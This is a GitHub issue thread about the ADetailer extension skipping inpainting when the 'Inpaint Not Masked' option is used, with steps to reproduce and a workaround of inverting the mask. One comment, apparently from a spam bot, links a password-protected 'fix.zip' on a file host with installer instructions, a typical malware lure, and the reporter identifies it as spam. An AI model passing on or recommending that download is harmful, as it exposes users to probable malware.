### ISSUE TITLE
[Bug]: "Inpaint NOT Masked" causes Adtailer to skip inpaint operation on Inpaint Upload tab

### ISSUE THREAD

**Issue by Shmeda** [Bing-su/adetailer#698]
### Describe the bug

When using the Inpaint Upload tab, Adetailer will perform inpainting as long as the detection falls inside the white area of the uploaded mask. However, selecting the "Inpaint Not Masked" with the same uploaded mask will cause the Adetailer inpaint operation to be skipped. It seems logical that Adetailer should be able to operate in the negative area of the uploaded mask if this option is selected.

In my case, I was trying to inpaint one person with a soft mask and thought it would be easier to just use A1111 interface to flip the mask in order to inpaint the second person in the same image on a following pass. I was surprised to find that it didn't work. I had to create an inversion of the original mask and upload that in order to allow Adetailer to operate.

### Steps to reproduce

1. Navigate to the inpaint upload tab in img2img. 
2. Upload an image to inpaint, then upload a black and white mask in the corresponding areas
3. Select the "Inpaint Not Masked" option
4. Generate 

### Screenshots

![image](https://github.com/user-attachments/assets/8882569f-b63f-4f62-96cc-a0a5ae37a1b2)
![image](https://github.com/user-attachments/assets/348816b5-7f57-4c25-97b7-fa25b275cb94)

### Console logs, from start to end.

```Shell
[-] ADetailer: img2img inpainting with no mask -- adetailer disabled.
```

**Comment by marcelo-antonio-nunes** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Shmeda** [comment]
I've looked through those previous issues and it seems like the authors did not adequately isolate the problem. Using an old version is not a viable solution. Perhaps the code to address this is complex, but it does seem to be a rather simple UX issue from a user perspective. It would at least be useful to know up front (in the UI somehow) that I will not get the expected result from the Inpaint Not Masked option with Adetailer.

**Comment by Shmeda** [comment]
Also, to be clear to anyone with the same issue looking for a workaround, **inverting the mask is the solution for now.** I didn't dig into these previous issues very far, but the suggestions to download previous versions are made by spamware bots. A bot posted this "solution" to my issue linking a questionable zip file within a minute of its creation.
